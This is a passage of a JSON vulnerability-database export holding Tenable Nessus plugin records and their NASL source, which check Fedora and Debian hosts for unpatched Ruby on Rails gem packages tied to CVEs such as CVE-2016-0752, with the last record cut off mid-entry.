script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby on Rails Dynamic Render File Upload Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"rubygem-actionview-4.2.0-3.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-actionview\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-11T16:35:07", "description": "Security fix for CVE-2016-0752\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "Fedora 23 : rubygem-actionview-4.2.3-3.fc23 (2016-97002ad37b)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2022-03-28T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygem-actionview", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2016-97002AD37B.NASL", "href": "https://www.tenable.com/plugins/nessus/89585", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-97002ad37b.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89585);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/28\");\n\n script_cve_id(\"CVE-2016-0752\");\n script_xref(name:\"FEDORA\", value:\"2016-97002ad37b\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n\n script_name(english:\"Fedora 23 : rubygem-actionview-4.2.3-3.fc23 (2016-97002ad37b)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Security fix for CVE-2016-0752\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1301963\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-February/178069.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?57da4d34\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected rubygem-actionview package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Ruby on Rails Dynamic Render File Upload Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"rubygem-actionview-4.2.3-3.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-actionview\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:39:24", "description": "Update to Rails 5.0.0.1.\n\nEnable whole test suite in Railties.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-11-15T00:00:00", "type": "nessus", "title": "Fedora 25 : 1:rubygem-actionmailer / 1:rubygem-actionpack / etc (2016-5760339e76)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6316", "CVE-2016-6317"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:1:rubygem-actionmailer", "p-cpe:/a:fedoraproject:fedora:1:rubygem-actionpack", "p-cpe:/a:fedoraproject:fedora:1:rubygem-activerecord", "p-cpe:/a:fedoraproject:fedora:1:rubygem-activesupport", "p-cpe:/a:fedoraproject:fedora:1:rubygem-rails", "p-cpe:/a:fedoraproject:fedora:rubygem-actioncable", "p-cpe:/a:fedoraproject:fedora:rubygem-actionview", "p-cpe:/a:fedoraproject:fedora:rubygem-activejob", "p-cpe:/a:fedoraproject:fedora:rubygem-activemodel", "p-cpe:/a:fedoraproject:fedora:rubygem-railties", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2016-5760339E76.NASL", "href": "https://www.tenable.com/plugins/nessus/94808", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-5760339e76.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94808);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-6316\", \"CVE-2016-6317\");\n script_xref(name:\"FEDORA\", value:\"2016-5760339e76\");\n\n script_name(english:\"Fedora 25 : 1:rubygem-actionmailer / 1:rubygem-actionpack / etc (2016-5760339e76)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to Rails 5.0.0.1.\n\nEnable whole test suite in Railties.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-5760339e76\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:rubygem-actionmailer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:rubygem-actionpack\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:rubygem-activerecord\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:rubygem-activesupport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:rubygem-rails\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actioncable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-actionview\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-activejob\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-activemodel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-railties\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"rubygem-actionmailer-5.0.0.1-1.fc25\", epoch:\"1\")) flag++;\nif (rpm_check(release:\"FC25\", reference:\"rubygem-actionpack-5.0.0.1-2.fc25\", epoch:\"1\")) flag++;\nif (rpm_check(release:\"FC25\", reference:\"rubygem-activerecord-5.0.0.1-1.fc25\", epoch:\"1\")) flag++;\nif (rpm_check(release:\"FC25\", reference:\"rubygem-activesupport-5.0.0.1-1.fc25\", epoch:\"1\")) flag++;\nif (rpm_check(release:\"FC25\", reference:\"rubygem-rails-5.0.0.1-1.fc25\", epoch:\"1\")) flag++;\nif (rpm_check(release:\"FC25\", reference:\"rubygem-actioncable-5.0.0.1-1.fc25\")) flag++;\nif (rpm_check(release:\"FC25\", reference:\"rubygem-actionview-5.0.0.1-2.fc25\")) flag++;\nif (rpm_check(release:\"FC25\", reference:\"rubygem-activejob-5.0.0.1-1.fc25\")) flag++;\nif (rpm_check(release:\"FC25\", reference:\"rubygem-activemodel-5.0.0.1-1.fc25\")) flag++;\nif (rpm_check(release:\"FC25\", reference:\"rubygem-railties-5.0.0.1-2.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"1:rubygem-actionmailer / 1:rubygem-actionpack / etc\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-03-01T14:21:18", "description": "Security fix for CVE-2015-7576 CVE-2016-0753\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "Fedora 22 : rubygem-activesupport-4.2.0-4.fc22 (2016-cb30088b06)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2016-0753"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygem-activesupport", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2016-CB30088B06.NASL", "href": "https://www.tenable.com/plugins/nessus/89614", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-cb30088b06.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89614);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-7576\", \"CVE-2016-0753\");\n script_xref(name:\"FEDORA\", value:\"2016-cb30088b06\");\n\n script_name(english:\"Fedora 22 : rubygem-activesupport-4.2.0-4.fc22 (2016-cb30088b06)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2015-7576 CVE-2016-0753\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1301933\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1301973\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-February/178047.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7aa733ef\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygem-activesupport package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-activesupport\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"rubygem-activesupport-4.2.0-4.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-activesupport\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-03-15T14:12:24", "description": "The support and utility classes used by the Rails 3.2 framework allow remote attackers to cause a denial of service (SystemStackError) via a large XML document depth.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 3.2.6-6+deb7u2.\n\nAdditionally this upload adds 'active_support/security_utils' that will be used by ruby-actionpack-3.2 to address CVE-2015-7576.\n\nWe recommend that you upgrade your ruby-activesupport-3.2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-08-29T00:00:00", "type": "nessus", "title": "Debian DLA-603-1 : ruby-activesupport-3.2 security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3227", "CVE-2015-7576"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:ruby-activesupport-3.2", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-603.NASL", "href": "https://www.tenable.com/plugins/nessus/93131", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-603-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93131);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-3227\");\n script_bugtraq_id(75234);\n\n script_name(english:\"Debian DLA-603-1 : ruby-activesupport-3.2 security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The support and utility classes used by the Rails 3.2 framework allow\nremote attackers to cause a denial of service (SystemStackError) via a\nlarge XML document depth.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n3.2.6-6+deb7u2.\n\nAdditionally this upload adds 'active_support/security_utils' that\nwill be used by ruby-actionpack-3.2 to address CVE-2015-7576.\n\nWe recommend that you upgrade your ruby-activesupport-3.2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2016/08/msg00027.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/ruby-activesupport-3.2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected ruby-activesupport-3.2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:ruby-activesupport-3.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"ruby-activesupport-3.2\", reference:\"3.2.6-6+deb7u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-03-01T14:25:16", "description": "The version of macOS Server (formerly known as Mac OS X Server) installed on the remote host is prior to 5.3. It is, therefore, affected by the following vulnerabilities :\n\n - A denial of service vulnerability exists in the Apache HTTP server when handling a saturation of partial HTTP requests. An unauthenticated, remote attacker can exploit this to crash the daemon. (CVE-2007-6750)\n\n - A denial of service vulnerability exists in Action Pack in Ruby on Rails due to improper restrictions on the use of the MIME type cache when handling specially crafted HTTP accept headers. An unauthenticated, remote attacker can exploit this to cause the cache to grow indefinitely. (CVE-2016-0751)\n\n - An information disclosure vulnerability exists in the Wiki Server component due to improper checking of unspecified permissions. An unauthenticated, remote can exploit this to enumerate users. (CVE-2017-2382)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-03-31T00:00:00", "type": "nessus", "title": "macOS : macOS Server < 5.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, 